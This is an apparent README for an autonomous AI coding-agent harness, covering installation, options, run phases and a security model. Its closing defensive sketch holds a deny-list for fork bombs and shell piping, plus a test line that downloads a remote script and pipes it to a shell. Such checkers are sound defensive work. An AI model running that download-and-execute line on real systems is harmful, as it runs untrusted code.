Agent Harness

An autonomous AI coding agent that builds entire applications from a simple description.


Table of Contents

  1. What Is This?
  2. What You'll Need
  3. Understanding Key Concepts
  4. Step-by-Step Setup
  5. Getting Claude Access
  6. Installing the Agent Harness
  7. Creating Your First App Specification
  8. Running the Agent
  9. Understanding the Phases
  10. All Options Explained
  11. Understanding the Output
  12. Troubleshooting
  13. Glossary
  14. Architecture Reference

What Is This?

The Simple Explanation

Imagine you could describe an app you want built in plain English, and then an AI builds it for you automatically. That's what this tool does.

You write something like:

"Build me a todo list app where users can add tasks, mark them complete, and delete them."

And the Agent Harness:

  1. Thinks through what needs to be built (planning)
  2. Breaks it down into small, manageable features
  3. Writes the code for each feature, one by one
  4. Tests its work to confirm it behaves as expected
  5. Keeps going until everything is done

Why Use This?

  • You don't need to know how to code - Just describe what you want
  • It builds complete projects - Not just code snippets, but full applications
  • It's autonomous - You can walk away and let it work
  • It's resumable - If something stops, it picks up where it left off
  • It has safety features - Human checkpoints let you review the work

How It Works (Visual Overview)

┌─────────────────────────────────────────────────────────────────┐
│                                                                 │
│   YOU                         AGENT HARNESS                     │
│                                                                 │
│   ┌─────────────┐            ┌─────────────────────────────┐   │
│   │ "Build me   │            │                             │   │
│   │  a todo     │ ────────►  │  Phase 1: VIBE PLAN         │   │
│   │  app..."    │            │  (Explores ideas freely)    │   │
│   └─────────────┘            │                             │   │
│                              │  Phase 2: INITIALIZATION    │   │
│                              │  (Creates feature list)     │   │
│                              │                             │   │
│                              │  Phase 3: CODING            │   │
│                              │  (Builds each feature)      │   │
│                              │                             │   │
│   ┌─────────────┐            │  Phase 4: VALIDATION        │   │
│   │ Complete    │ ◄────────  │  (You review the work)      │   │
│   │ Application │            │                             │   │
│   └─────────────┘            └─────────────────────────────┘   │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘

What You'll Need

Before we start, make sure you have:

| Requirement | Description |
|---|---|
| A computer | Mac, Windows, or Linux |
| Internet connection | For downloading tools and AI access |
| 30-60 minutes | For the initial setup |
| Claude access | Either an API key OR a Claude Max/Pro subscription |

Cost considerations:

  • Claude API: Pay per use (roughly $3-15 per application built, depending on size)
  • Claude Max: Subscription starting at $100/month with generous usage included

Understanding Key Concepts

If you're completely new to this, here are the terms you'll encounter:

The Terminal (Command Line)

The terminal is a text-based way to control your computer. Instead of clicking on icons, you type commands.

This is what the terminal looks like:

your-computer:~ username$ _
                           ↑
                     You type here

Why use it? Many developer tools only work through the terminal. Don't worry - we'll show you exactly what to type.

Git and GitHub

  • Git is a tool that tracks changes to your code (like "undo history" for an entire project)
  • GitHub is a website that stores your code online (like Google Drive for code)

Why do we need this? The Agent Harness uses Git to save its work and let you see what changed.

Node.js

Node.js is a program that runs JavaScript code on your computer. The Agent Harness is written in JavaScript/TypeScript, so you need Node.js to run it.

API Key

An API key is like a password that lets programs access online services. You'll need one to let the Agent Harness talk to Claude (the AI).

Claude

Claude is an AI assistant made by Anthropic. It's the "brain" that writes the code. There are different ways to access Claude:

  1. Claude API - Direct access, pay per use
  2. Claude Code - A command-line tool that uses Claude
  3. Claude Max/Pro - Subscription plans with Claude Code included

Step-by-Step Setup

Choose your operating system:


Mac Setup

Step 1: Open the Terminal

  1. Press Command (⌘) + Space on your keyboard
  2. Type Terminal
  3. Press Enter

A window should appear with a prompt like:

your-name@your-mac ~ %

Tip: You can also find Terminal in Applications → Utilities → Terminal

Step 2: Install Homebrew (Package Manager)

Homebrew is a tool that makes installing other software easy on Mac.

  1. Copy and paste this entire command into your terminal:
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
  2. Press Enter
  3. You may be asked to enter your Mac password (the one you use to log in)
    • Note: When you type your password, nothing will appear on screen - this is normal for security
    • Just type it and press Enter
  4. Wait for it to finish (this can take 5-10 minutes)

How to verify it worked:

brew --version

You should see something like Homebrew 4.x.x

Step 3: Install Node.js

Node.js lets your computer run the Agent Harness.

  1. Type this command and press Enter:
brew install node
  2. Wait for it to finish

How to verify it worked:

node --version

You should see something like v20.x.x or v22.x.x

Also check npm (Node's package manager):

npm --version

You should see something like 10.x.x

Step 4: Install Git

Git tracks changes to your code.

  1. Type this command and press Enter:
brew install git

How to verify it worked:

git --version

You should see something like git version 2.x.x

Step 5: Configure Git (First Time Only)

Tell Git who you are (this is attached to the code changes you make):

git config --global user.name "Your Name"
git config --global user.email "your.email@example.com"

Replace Your Name and your.email@example.com with your actual name and email.

Step 6: Install GitHub CLI

The GitHub CLI lets you interact with GitHub from the terminal.

  1. Type this command and press Enter:
brew install gh

How to verify it worked:

gh --version

You should see something like gh version 2.x.x

Step 7: Log in to GitHub

  1. If you don't have a GitHub account, go to github.com and create one (it's free)

  2. In your terminal, type:

gh auth login
  3. You'll see a series of questions. Choose these options:

    • What account do you want to log into? → GitHub.com
    • What is your preferred protocol? → HTTPS
    • Authenticate Git with your GitHub credentials? → Yes
    • How would you like to authenticate? → Login with a web browser
  4. A code will appear. Press Enter, and a browser window will open

  5. Paste the code in the browser and authorize the application

How to verify it worked:

gh auth status

You should see "Logged in to github.com"

Step 8: Install Claude Code

Claude Code is the command-line tool that lets Claude write code for you.

npm install -g @anthropic-ai/claude-code

How to verify it worked:

claude --version

You should see version information.

Now continue to Getting Claude Access


Windows Setup

Step 1: Install Windows Terminal (Recommended)

Windows has a built-in terminal, but Windows Terminal is better.

  1. Open the Microsoft Store (search for it in the Start menu)
  2. Search for Windows Terminal
  3. Click Install
  4. Once installed, open Windows Terminal from the Start menu

Step 2: Install Node.js

  1. Open your web browser and go to: https://nodejs.org
  2. Click the big green button that says "LTS" (Long Term Support)
  3. A file will download (something like node-v20.x.x-x64.msi)
  4. Double-click the downloaded file to run the installer
  5. Click Next through all the screens, accepting the defaults
  6. Click Install
  7. Click Finish when done

How to verify it worked:

  1. Open Windows Terminal
  2. Type:
node --version

You should see something like v20.x.x

Also check npm:

npm --version

Step 3: Install Git

  1. Go to: https://git-scm.com/download/windows
  2. The download should start automatically
  3. Run the installer
  4. Important settings during installation:
    • Choosing the default editor: Select "Use Visual Studio Code" or "Use Notepad++" if you have them, otherwise keep the default
    • Adjusting your PATH: Select "Git from the command line and also from 3rd-party software"
    • For all other options, the defaults are fine - just click Next
  5. Click Install, then Finish

How to verify it worked:

Close and reopen Windows Terminal, then type:

git --version

Step 4: Configure Git (First Time Only)

git config --global user.name "Your Name"
git config --global user.email "your.email@example.com"

Step 5: Install GitHub CLI

  1. Go to: https://cli.github.com
  2. Click Download for Windows
  3. Run the installer
  4. Follow the prompts and click Install

How to verify it worked:

Close and reopen Windows Terminal, then type:

gh --version

Step 6: Log in to GitHub

  1. Create a GitHub account at github.com if you don't have one
  2. In Windows Terminal, type:
gh auth login
  3. Follow the prompts (same as Mac instructions above)

Step 7: Install Claude Code

npm install -g @anthropic-ai/claude-code

How to verify it worked:

claude --version

Now continue to Getting Claude Access


Linux Setup

These instructions are for Ubuntu/Debian-based distributions. Commands may vary for other distributions.

Step 1: Open Terminal

Press Ctrl + Alt + T or find Terminal in your applications menu.

Step 2: Update Your System

sudo apt update && sudo apt upgrade -y

Enter your password when prompted.

Step 3: Install Node.js

curl -fsSL https://deb.nodesource.com/setup_20.x | sudo -E bash -
sudo apt install -y nodejs

Verify:

node --version
npm --version

Step 4: Install Git

sudo apt install -y git

Verify:

git --version

Step 5: Configure Git

git config --global user.name "Your Name"
git config --global user.email "your.email@example.com"

Step 6: Install GitHub CLI

curl -fsSL https://cli.github.com/packages/githubcli-archive-keyring.gpg | sudo dd of=/usr/share/keyrings/githubcli-archive-keyring.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/githubcli-archive-keyring.gpg] https://cli.github.com/packages stable main" | sudo tee /etc/apt/sources.list.d/github-cli.list > /dev/null
sudo apt update
sudo apt install gh -y

Verify:

gh --version

Step 7: Log in to GitHub

gh auth login

Follow the prompts.

Step 8: Install Claude Code

npm install -g @anthropic-ai/claude-code

Verify:

claude --version

Now continue to Getting Claude Access


Getting Claude Access

You need to connect Claude (the AI) to the Agent Harness. There are two ways to do this:

Option A: Claude Max/Pro Subscription (Recommended for Beginners)

If you have a Claude Max (starting at $100/month) or Claude Pro subscription, Claude Code is included.

Step 1: Set Up Claude Code Authentication

  1. In your terminal, type:
claude
  2. Claude Code will open and ask you to authenticate
  3. Follow the prompts to log in with your Anthropic account
  4. Once logged in, type /exit to close Claude Code

That's it! Claude Code will remember your login.

Option B: Using an API Key

If you want to use the API directly (pay-per-use):

Step 1: Create an Anthropic Account

  1. Go to https://console.anthropic.com
  2. Click Sign Up and create an account
  3. Verify your email

Step 2: Add Payment Method

  1. In the Anthropic Console, go to Settings → Billing
  2. Add a credit card
  3. Add some credits (start with $10-20 for testing)

Step 3: Create an API Key

  1. Go to Settings → API Keys
  2. Click Create Key
  3. Give it a name like "agent-harness"
  4. Copy the key immediately - you won't be able to see it again!

The key looks like: sk-ant-api03-xxxxxxxxxxxx...

Step 4: Save Your API Key

You need to make this key available to the Agent Harness.

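On Mac (zsh is the default shell):

echo 'export ANTHROPIC_API_KEY=sk-ant-api03-your-key-here' >> ~/.zshrc
source ~/.zshrc

On Linux (most distributions default to bash):

echo 'export ANTHROPIC_API_KEY=sk-ant-api03-your-key-here' >> ~/.bashrc
source ~/.bashrc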

On Windows (PowerShell):

[Environment]::SetEnvironmentVariable("ANTHROPIC_API_KEY", "sk-ant-api03-your-key-here", "User")

Then close and reopen your terminal.

IMPORTANT: Replace sk-ant-api03-your-key-here with your actual API key.

Security note: Never share your API key or commit it to GitHub.
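The two access options can be pictured as two credential paths inside a tool. The following is a minimal sketch, not the harness's actual code: `resolveAuthMode` and `AuthMode` are hypothetical names, and the prefix check is an assumption based only on the example key format shown above.

```typescript
// Hypothetical sketch: choosing between Claude Code login and an API key.
type AuthMode =
  | { kind: "subprocess" } // Option A: Claude Code handles the login
  | { kind: "api"; apiKey: string }; // Option B: direct API access

function resolveAuthMode(
  useSubprocess: boolean,
  env: Record<string, string | undefined>,
): AuthMode {
  if (useSubprocess) {
    return { kind: "subprocess" };
  }
  const apiKey = env["ANTHROPIC_API_KEY"]?.trim();
  if (!apiKey) {
    throw new Error("ANTHROPIC_API_KEY not set");
  }
  // Assumption: keys start with "sk-ant-", as in the example above.
  if (!apiKey.startsWith("sk-ant-")) {
    throw new Error("ANTHROPIC_API_KEY does not look like an Anthropic key");
  }
  return { kind: "api", apiKey };
}
```

Passing the environment in as a parameter keeps the function easy to test, and the error messages never echo the key itself.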


Installing the Agent Harness

Now let's get the Agent Harness itself!

Step 1: Clone the Repository

This downloads the Agent Harness code from GitHub to your computer.

git clone https://github.com/tripleyak/agent-harness.git

Step 2: Navigate to the Folder

cd agent-harness

Your terminal prompt should now show you're in the agent-harness folder.

Step 3: Install Dependencies

This downloads all the code libraries that Agent Harness needs:

npm install

Wait for it to finish. You'll see lots of text scrolling by - this is normal.

Step 4: Build the Project

This compiles the code so it can run:

npm run build

How to verify it worked:

npm start -- --help

You should see a help message with all the available commands.


Creating Your First App Specification

An app specification (or "spec") is a text file that describes what you want to build.

Step 1: Create a New File

You can use any text editor. Here's how to do it from the terminal:

On Mac/Linux:

nano prompts/my_first_app.txt

On Windows:

notepad prompts/my_first_app.txt

Step 2: Write Your Description

Here's an example of a simple app spec:

# Simple Todo App

A command-line todo list application.

## Requirements

- Users can add new tasks with a description
- Users can list all tasks
- Users can mark tasks as complete
- Users can delete tasks
- Tasks are saved to a file so they persist between runs
- Use Node.js with no external dependencies

## Example Usage

$ node todo.js add "Buy groceries"
Added: Buy groceries

$ node todo.js list
1. [ ] Buy groceries

$ node todo.js complete 1
Completed: Buy groceries

$ node todo.js list
1. [x] Buy groceries

Step 3: Save the File

  • nano: Press Ctrl + X, then Y, then Enter
  • notepad: Press Ctrl + S and close the window

Tips for Writing Good Specs

  1. Be specific - Instead of "build a good app", say exactly what features you want
  2. Include examples - Show how you expect the app to work
  3. Mention technologies - If you want Node.js, Python, etc., say so
  4. List constraints - "No external dependencies" or "Must work offline"
  5. Start small - Your first project should be simple (5-10 features)

Example Specs

Minimal (2 features):

# Hello Greeter

A simple Node.js module that greets users.

## Requirements
- Single file: greeter.js
- One function: greet(name) returns "Hello, {name}!"
- Handle empty name: return "Hello, stranger!"
- No external dependencies
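For a sense of how little code a spec this small asks for, here is a sketch of something that would satisfy it. It is an illustration written in TypeScript, not output from the agent (the spec itself asks for a plain greeter.js file), and treating a whitespace-only name as empty is an assumption.

```typescript
// Illustrative only: one way to satisfy the "Hello Greeter" spec.
function greet(name: string): string {
  const trimmed = name.trim();
  // Assumption: a whitespace-only name counts as empty.
  return trimmed.length === 0 ? "Hello, stranger!" : `Hello, ${trimmed}!`;
}

console.log(greet("Ada")); // Hello, Ada!
console.log(greet("")); // Hello, stranger!
```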

Medium (10 features):

# Password Generator CLI

A command-line password generator tool.

## Requirements
- Generate random passwords of specified length
- Option to include/exclude: uppercase, lowercase, numbers, symbols
- Option to generate multiple passwords at once
- Copy password to clipboard
- Save passwords to encrypted file
- Check password strength
- No external dependencies except for clipboard functionality

Running the Agent

Basic Command

Navigate to the agent-harness folder and run:

npm start -- run -s prompts/my_first_app.txt --subprocess

Let's break this down:

  • npm start - Starts the Agent Harness
  • -- - Separates npm arguments from program arguments
  • run - The command to run the agent
  • -s prompts/my_first_app.txt - Path to your app specification
  • --subprocess - Uses Claude Code for authentication (recommended)

What Happens Next

  1. Project folder created - A new folder appears (default: agent_project/)
  2. Vibe plan phase - The AI thinks through the project
  3. Initialization - Features are identified and listed
  4. Coding begins - Features are built one by one
  5. Completion - All features are implemented

Watching the Progress

The terminal will show you what's happening:

🤖 Agent Harness - Autonomous Coding Agent

   Project: /path/to/agent_project
   Mode: Claude Code subprocess (Max plan)
   Model: claude-opus-4-5-20251101
   Features: 50

📁 New project detected. Running initialization...

🎨 Phase 1: Vibe Plan (Exploration)
   Exploring project ideas and architecture...

🏗 Phase 2: Structured Planning & Setup

📊 Progress:
   Total features: 5
   Completed: 2 (40%)
   In progress: 1
   [████████████░░░░░░░░░░░░░░░░░░] 40%

Stopping and Resuming

  • To stop: Press Ctrl + C
  • To resume: Run the same command again - it picks up where it left off

Running with All Features

For a full-featured run with human review:

npm start -- run \
  -s prompts/my_first_app.txt \
  --project ./my_app \
  --subprocess \
  --enable-rag \
  --enable-validation \
  --review-every 3 \
  --enable-tests

Understanding the Phases

Phase 1: Vibe Plan (Exploration)

What it does: The AI freely explores your idea, thinking about:

  • Architecture approaches
  • Potential challenges
  • Edge cases
  • Technology choices

Output: vibe-plan-notes.md - A document with the AI's thoughts

Skip it with: --skip-vibe-plan

Phase 2: Initialization

What it does:

  • Reads your app specification
  • Creates a detailed feature list
  • Sets up the project folder structure
  • Initializes git repository

Output: feature_list.json - List of all features to build

Phase 3: Coding Sessions

What it does:

  • Works through features one by one
  • Writes code for each feature
  • Commits changes to git
  • Tracks progress in feature_list.json

Each session:

  1. Looks at what's done and what's next
  2. Picks the next feature
  3. Writes the code
  4. Marks it complete
  5. Repeats until done
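The session steps above can be sketched as a small selection routine. This is a sketch under assumptions, not the harness's implementation: the `Feature` shape and the function names are hypothetical, the status values come from the Feature Status table in this guide, and resuming `in_progress` work before starting `pending` work is an assumed ordering.

```typescript
type FeatureStatus = "pending" | "in_progress" | "passing" | "failing";

// Hypothetical shape of one entry in feature_list.json.
interface Feature {
  id: number;
  description: string;
  status: FeatureStatus;
}

// Assumed priority: resume interrupted work first, then start new work.
const PICK_ORDER: FeatureStatus[] = ["in_progress", "pending"];

function pickNextFeature(features: Feature[]): Feature | undefined {
  for (const status of PICK_ORDER) {
    const match = features.find((f) => f.status === status);
    if (match) return match;
  }
  return undefined; // nothing left to build
}

// Returns a new list with the given feature marked as completed.
function markComplete(features: Feature[], id: number): Feature[] {
  return features.map((f) =>
    f.id === id ? { ...f, status: "passing" as const } : f,
  );
}

const exampleFeatures: Feature[] = [
  { id: 1, description: "Add a task", status: "passing" },
  { id: 2, description: "List tasks", status: "in_progress" },
  { id: 3, description: "Delete a task", status: "pending" },
];
console.log(pickNextFeature(exampleFeatures)?.id); // 2
```

Because the list is the only state, stopping after any step and calling `pickNextFeature` again later yields the same next feature.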

Phase 4: Validation (Optional)

What it does: Pauses for you to review the AI's work

When it triggers:

  • After every N features (configurable)
  • Automatically for security-related features

Your options:

  • Approve - Continue to next feature
  • Reject - Stop for manual fixes
  • Skip - Continue without approval
  • Feedback - Tell the AI what to change
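The two triggers described under "When it triggers" can be expressed as a single check. The sketch below is an assumption-laden illustration: `needsReview`, `ReviewConfig`, and the keyword list are hypothetical, and the real harness may detect security-related features in a different way.

```typescript
// Hypothetical settings, mirroring --enable-validation and --review-every <n>.
interface ReviewConfig {
  enabled: boolean;
  reviewEvery: number;
}

// Assumption: security-related features are spotted by keyword.
const SECURITY_KEYWORDS = ["auth", "password", "encrypt", "token", "permission"];

function isSecurityRelated(description: string): boolean {
  const text = description.toLowerCase();
  return SECURITY_KEYWORDS.some((word) => text.includes(word));
}

function needsReview(
  completedCount: number,
  description: string,
  config: ReviewConfig,
): boolean {
  if (!config.enabled) return false;
  // Trigger 2: security-related features always pause for review.
  if (isSecurityRelated(description)) return true;
  // Trigger 1: pause after every N completed features.
  return (
    config.reviewEvery > 0 &&
    completedCount > 0 &&
    completedCount % config.reviewEvery === 0
  );
}

const config: ReviewConfig = { enabled: true, reviewEvery: 3 };
console.log(needsReview(3, "List all tasks", config)); // true
console.log(needsReview(2, "List all tasks", config)); // false
console.log(needsReview(2, "Hash the user password", config)); // true
```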

All Options Explained

Required Options

| Option | Description | Example |
|---|---|---|
| -s, --spec <path> | Path to your app specification file | -s prompts/my_app.txt |

Common Options

| Option | Description | Default | Example |
|---|---|---|---|
| -p, --project <dir> | Where to create the project | ./agent_project | -p ./my_app |
| -m, --model <model> | Which AI model to use | claude-opus-4-5-20251101 | -m claude-sonnet-4-5-20250929 |
| -f, --features <n> | Maximum features to generate | 50 | -f 20 |
| -i, --iterations <n> | Maximum coding sessions (0=unlimited) | 0 | -i 10 |
| --subprocess | Use Claude Code for auth | Off | --subprocess |

Advanced Options

| Option | Description | Default |
|---|---|---|
| --skip-vibe-plan | Skip the exploration phase | Off |
| --no-auto-resume | Don't automatically continue | Auto-resume on |
| -d, --delay <ms> | Wait time between sessions | 3000 (3 seconds) |
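To make the defaults concrete, here is a simplified sketch of how the required, common, and advanced options could be turned into a settings object. It is not the harness's real parser (a real CLI would typically use an argument-parsing library); `RunOptions`, `parseRunArgs`, and `toInt` are hypothetical names, while the flags and default values are copied from the tables above.

```typescript
// Hypothetical sketch of option handling; not the harness's real parser.
interface RunOptions {
  spec: string;
  project: string;
  model: string;
  features: number;
  iterations: number; // 0 means unlimited
  delayMs: number;
  subprocess: boolean;
  skipVibePlan: boolean;
  autoResume: boolean;
}

// Defaults copied from the option tables.
const DEFAULTS: Omit<RunOptions, "spec"> = {
  project: "./agent_project",
  model: "claude-opus-4-5-20251101",
  features: 50,
  iterations: 0,
  delayMs: 3000,
  subprocess: false,
  skipVibePlan: false,
  autoResume: true,
};

function toInt(flag: string, raw: string): number {
  const value = Number.parseInt(raw, 10);
  if (Number.isNaN(value) || value < 0) {
    throw new Error(`${flag} expects a non-negative integer, got "${raw}"`);
  }
  return value;
}

function parseRunArgs(argv: string[]): RunOptions {
  let spec: string | undefined;
  const options = { ...DEFAULTS };
  const queue = [...argv];

  while (queue.length > 0) {
    const flag = queue.shift() as string;
    // Reads the value that follows a flag such as "-s <path>".
    const value = (): string => {
      const next = queue.shift();
      if (next === undefined) throw new Error(`Missing value for ${flag}`);
      return next;
    };
    switch (flag) {
      case "-s": case "--spec": spec = value(); break;
      case "-p": case "--project": options.project = value(); break;
      case "-m": case "--model": options.model = value(); break;
      case "-f": case "--features": options.features = toInt(flag, value()); break;
      case "-i": case "--iterations": options.iterations = toInt(flag, value()); break;
      case "-d": case "--delay": options.delayMs = toInt(flag, value()); break;
      case "--subprocess": options.subprocess = true; break;
      case "--skip-vibe-plan": options.skipVibePlan = true; break;
      case "--no-auto-resume": options.autoResume = false; break;
      default: throw new Error(`Unknown option: ${flag}`);
    }
  }

  if (spec === undefined) {
    throw new Error("Missing required option: -s, --spec <path>");
  }
  return { spec, ...options };
}
```

For example, `parseRunArgs(["-s", "prompts/app.txt", "--subprocess", "-f", "5"])` would keep every default except `features` and `subprocess`.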

Feature Flags

| Option | Description |
|---|---|
| --enable-rag | Gather context from existing code |
| --enable-validation | Enable human review checkpoints |
| --review-every <n> | Review after every N features |
| --enable-tests | Run tests before each session |
| --test-after-each | Also run tests after each feature |

Example Commands

Minimal run:

npm start -- run -s prompts/app.txt --subprocess

Full featured:

npm start -- run \
  -s prompts/app.txt \
  --project ./my_project \
  --subprocess \
  --features 30 \
  --enable-rag \
  --enable-validation \
  --review-every 5 \
  --enable-tests \
  --test-after-each

Quick test (small project):

npm start -- run \
  -s prompts/minimal_spec.txt \
  --project ./test_project \
  --subprocess \
  --features 5 \
  --iterations 3 \
  --skip-vibe-plan

Check project status:

npm start -- status -p ./my_project

Understanding the Output

The Project Folder

After running, you'll find these files in your project folder:

my_project/
├── feature_list.json      # List of features and their status
├── app_spec.txt           # Copy of your specification
├── vibe-plan-notes.md     # AI's exploration thoughts
├── claude-progress.txt    # Session log
├── human-feedback.md      # Your feedback (if any)
├── validation-log.json    # Review decisions
├── .git/                  # Git repository
└── [your app files]       # The actual code!

Feature Status

In feature_list.json, each feature has a status:

| Status | Meaning |
|---|---|
| pending | Not started yet |
| in_progress | Currently being worked on |
| passing | Completed successfully |
| failing | Attempted but has issues |

Git Commits

Every feature creates a git commit. You can see the history:

cd my_project
git log --oneline

To see what changed in a commit:

git show <commit-id>

Progress Bar

📊 Progress:
   Total features: 10
   Completed: 4 (40%)
   In progress: 1
   Failed: 0
   Pending: 5
   [████████████░░░░░░░░░░░░░░░░░░] 40%
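The numbers in this display can be derived from the feature statuses alone. The following sketch shows one way to do that; `summarize` and `renderBar` are hypothetical names, and the 30-cell bar width is inferred from the sample output above rather than taken from the harness's source.

```typescript
type FeatureStatus = "pending" | "in_progress" | "passing" | "failing";

interface ProgressSummary {
  total: number;
  completed: number;
  inProgress: number;
  failed: number;
  pending: number;
  percent: number;
}

function summarize(statuses: FeatureStatus[]): ProgressSummary {
  const count = (wanted: FeatureStatus): number =>
    statuses.filter((s) => s === wanted).length;
  const total = statuses.length;
  const completed = count("passing");
  return {
    total,
    completed,
    inProgress: count("in_progress"),
    failed: count("failing"),
    pending: count("pending"),
    // Only "passing" features count toward the percentage.
    percent: total === 0 ? 0 : Math.round((completed / total) * 100),
  };
}

// Assumption: the bar is 30 cells wide, as in the sample output.
function renderBar(percent: number, width = 30): string {
  const clamped = Math.min(100, Math.max(0, percent));
  const filled = Math.round((clamped / 100) * width);
  return `[${"█".repeat(filled)}${"░".repeat(width - filled)}] ${clamped}%`;
}

const statuses: FeatureStatus[] = [
  "passing", "passing", "passing", "passing", "in_progress",
  "pending", "pending", "pending", "pending", "pending",
];
const summary = summarize(statuses);
console.log(`Completed: ${summary.completed} (${summary.percent}%)`); // Completed: 4 (40%)
console.log(renderBar(summary.percent)); // 12 of 30 cells filled, then 40%
```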

Troubleshooting

"Command not found: claude"

Problem: Claude Code isn't installed properly.

Solution:

npm install -g @anthropic-ai/claude-code

If that doesn't work, try:

sudo npm install -g @anthropic-ai/claude-code

"ANTHROPIC_API_KEY not set"

Problem: The API key isn't configured.

Solutions:

  1. If using Claude Max: Make sure you ran claude and logged in first

  2. If using API key: Set it in your terminal:

    export ANTHROPIC_API_KEY=your-key-here

"Permission denied"

Problem: You don't have permission to install or run something.

Solution: On Mac/Linux, add sudo before the command:

sudo npm install -g @anthropic-ai/claude-code

"Cannot find module"

Problem: Dependencies aren't installed.

Solution:

cd agent-harness
npm install
npm run build

The agent keeps stopping

Problem: You may be hitting rate limits, running out of API credits, or the agent may be stuck on a feature it cannot complete.

Solutions:

  1. Wait a few minutes and run again (it will resume)
  2. Check your API credits if using pay-per-use
  3. Try a simpler specification

The code doesn't work

Problem: The AI made mistakes.

Solutions:

  1. Enable validation: --enable-validation --review-every 1
  2. Provide more specific requirements in your spec
  3. Check the generated code and provide feedback
  4. Start with a simpler project

How to start over

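If you want to completely restart, delete the project folder. This permanently removes everything the agent generated, including its Git history. If you used --project, substitute that path.

On Mac/Linux:

rm -rf ./agent_project

On Windows (PowerShell):

Remove-Item -Recurse -Force .\agent_project

Then run the command again.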


Glossary

| Term | Definition |
|---|---|
| Agent | An AI system that can take actions autonomously |
| API | Application Programming Interface - how programs talk to each other |
| API Key | A secret code that authenticates you to a service |
| CLI | Command Line Interface - text-based program interaction |
| Clone | Download a copy of a Git repository |
| Commit | A saved snapshot of code changes in Git |
| Dependencies | Other code libraries your project needs |
| Git | Version control system that tracks code changes |
| GitHub | Website that hosts Git repositories |
| Homebrew | Package manager for Mac |
| JSON | A text format for storing structured data |
| Node.js | Program that runs JavaScript on your computer |
| npm | Node Package Manager - installs JavaScript libraries |
| OAuth | A way to log in without sharing your password |
| RAG | Retrieval-Augmented Generation - giving AI relevant context |
| Repository (Repo) | A folder tracked by Git |
| Terminal | Text-based interface to control your computer |
| Token | A unit of text that AI models process |
| TypeScript | JavaScript with added type checking |

Architecture Reference

System Overview

┌─────────────────────────────────────────────────────────────┐
│                     Agent Harness                            │
├─────────────────────────────────────────────────────────────┤
│  Orchestrator (index.ts)                                     │
│    ├── Vibe Plan Session → Generate exploration notes       │
│    ├── Initializer Session → Generate feature_list.json     │
│    └── Coder Sessions → Implement features incrementally    │
├─────────────────────────────────────────────────────────────┤
│  Agent Modes                                                 │
│    ├── API Mode (agent.ts) → Direct Anthropic API calls     │
│    └── Subprocess Mode (agent-subprocess.ts) → Claude Code  │
├─────────────────────────────────────────────────────────────┤
│  Context Engineering                                         │
│    ├── RAG (rag.ts) → Retrieve relevant code context        │
│    ├── Vibe Plan (vibe-plan.ts) → Unstructured exploration  │
│    └── Human Feedback → Incorporate review notes            │
├─────────────────────────────────────────────────────────────┤
│  Validation                                                  │
│    ├── Human Checkpoints (validation.ts)                    │
│    └── Test Runner (test-runner.ts)                         │
├─────────────────────────────────────────────────────────────┤
│  Security (security.ts)                                      │
│    ├── Command allowlist                                     │
│    ├── Path boundary validation                              │
│    └── Dangerous pattern detection                           │
├─────────────────────────────────────────────────────────────┤
│  State Management                                            │
│    └── feature_list.json (source of truth)                   │
└─────────────────────────────────────────────────────────────┘

Two-Agent Pattern

  1. Initializer Agent (Session 1)

    • Reads application specification
    • Generates comprehensive feature list
    • Sets up project structure
    • Initializes git repository
  2. Coder Agent (Sessions 2+)

    • Reads progress from feature_list.json
    • Implements features incrementally
    • Tests and commits changes
    • Auto-continues between sessions
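The hand-off between the two agents can be sketched as a decision made at the start of every run. This is an illustration under assumptions, not the orchestrator's actual logic: `nextSession` and `SessionKind` are hypothetical names, and the rule that a missing feature_list.json means "run the initializer" is inferred from the description above.

```typescript
type FeatureStatus = "pending" | "in_progress" | "passing" | "failing";
type SessionKind = "initializer" | "coder" | "stop";

// `statuses` is null when feature_list.json does not exist yet (assumption).
// `maxIterations` follows the -i option: 0 means unlimited.
function nextSession(
  statuses: FeatureStatus[] | null,
  codingSessionsRun: number,
  maxIterations: number,
): SessionKind {
  if (statuses === null) return "initializer";
  const workRemains = statuses.some((s) => s !== "passing");
  if (!workRemains) return "stop";
  const limitReached = maxIterations > 0 && codingSessionsRun >= maxIterations;
  return limitReached ? "stop" : "coder";
}

console.log(nextSession(null, 0, 0)); // initializer
console.log(nextSession(["passing", "pending"], 4, 0)); // coder
console.log(nextSession(["passing", "pending"], 3, 3)); // stop
console.log(nextSession(["passing", "passing"], 1, 0)); // stop
```

Because the decision depends only on files and counters, rerunning the same command after an interruption lands in the same branch, which is what makes resuming possible.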

Security Model

Defense-in-depth approach:

  1. Command Allowlist - Only specific commands can execute
  2. Path Boundary - All file operations restricted to project directory
  3. Dangerous Pattern Detection - Blocks fork bombs, pipe to shell, etc.
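A rough sketch of how these three layers might look in code follows. Everything here is hypothetical: the allowlist contents, the two regular expressions, and the function names are illustrative assumptions, and the harness's own security.ts may work differently. The path check handles POSIX-style paths only and does not resolve symlinks.

```typescript
// Hypothetical allowlist; the real list belongs to the harness's security.ts.
const ALLOWED_COMMANDS = new Set(["node", "npm", "git", "ls", "cat", "mkdir"]);

// Illustrative patterns only; a real deny-list would be broader.
const DANGEROUS_PATTERNS: RegExp[] = [
  /:\(\)\s*\{.*\};\s*:/, // classic bash fork bomb
  /\|\s*(sh|bash|zsh)\b/, // piping output into a shell
];

interface CommandCheck {
  allowed: boolean;
  reason?: string;
}

function checkCommand(command: string): CommandCheck {
  const trimmed = command.trim();
  for (const pattern of DANGEROUS_PATTERNS) {
    if (pattern.test(trimmed)) {
      return { allowed: false, reason: "matches a dangerous pattern" };
    }
  }
  const program = trimmed.split(/\s+/)[0] ?? "";
  if (!ALLOWED_COMMANDS.has(program)) {
    return { allowed: false, reason: `"${program}" is not on the allowlist` };
  }
  return { allowed: true };
}

// Collapses "." and ".." segments in a POSIX-style path.
function normalizeSegments(path: string): string[] {
  const parts: string[] = [];
  for (const segment of path.split("/")) {
    if (segment === "" || segment === ".") continue;
    if (segment === "..") parts.pop();
    else parts.push(segment);
  }
  return parts;
}

// True when `target` (absolute, or relative to the root) stays inside the root.
function isInsideProject(projectRoot: string, target: string): boolean {
  const rootParts = normalizeSegments(projectRoot);
  const absolute = target.startsWith("/") ? target : `${projectRoot}/${target}`;
  const targetParts = normalizeSegments(absolute);
  return rootParts.every((part, index) => targetParts[index] === part);
}

console.log(checkCommand("npm install").allowed); // true
console.log(checkCommand("curl http://example.com/x.sh | sh").allowed); // false
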